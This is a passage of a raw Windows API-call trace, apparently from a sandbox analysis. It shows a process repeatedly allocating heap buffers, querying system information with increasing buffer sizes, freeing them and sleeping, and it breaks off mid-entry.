1 [0280.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0280.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0280.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.217] Sleep (dwMilliseconds=0x110) [0280.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0280.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0280.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0280.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0280.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0280.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0280.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0280.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0280.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.239] Sleep (dwMilliseconds=0x110) [0280.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0280.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0280.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0280.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0280.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0280.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0280.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0280.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0280.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.251] Sleep (dwMilliseconds=0x110) [0280.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0280.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0280.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0280.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0280.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0280.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0280.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0280.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0280.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.267] Sleep (dwMilliseconds=0x110) [0280.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0280.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0280.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0280.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0280.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0280.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0280.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0280.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0280.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.298] Sleep (dwMilliseconds=0x110) [0280.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0280.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0280.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0280.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0280.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0280.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0280.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0280.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0280.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.313] Sleep (dwMilliseconds=0x110) [0280.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0280.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0280.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0280.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0280.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0280.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0280.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0280.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0280.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.328] Sleep (dwMilliseconds=0x110) [0280.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0280.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0280.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0280.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0280.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0280.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0280.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0280.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0280.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.345] Sleep (dwMilliseconds=0x110) [0280.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0280.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0280.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0280.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0280.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0280.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0280.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0280.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0280.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.360] Sleep (dwMilliseconds=0x110) [0280.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0280.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0280.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0280.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0280.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0280.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0280.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0280.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0280.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.375] Sleep (dwMilliseconds=0x110) [0280.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0280.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0280.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0280.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0280.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0280.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0280.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0280.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0280.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.391] Sleep (dwMilliseconds=0x110) [0280.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0280.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0280.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0280.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0280.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0280.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0280.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0280.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0280.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.407] Sleep (dwMilliseconds=0x110) [0280.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0280.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0280.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0280.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0280.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0280.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0280.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0280.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0280.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.423] Sleep (dwMilliseconds=0x110) [0280.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0280.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0280.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0280.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0280.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0280.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0280.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0280.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0280.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.439] Sleep (dwMilliseconds=0x110) [0280.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0280.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0280.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0280.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0280.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0280.462] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: 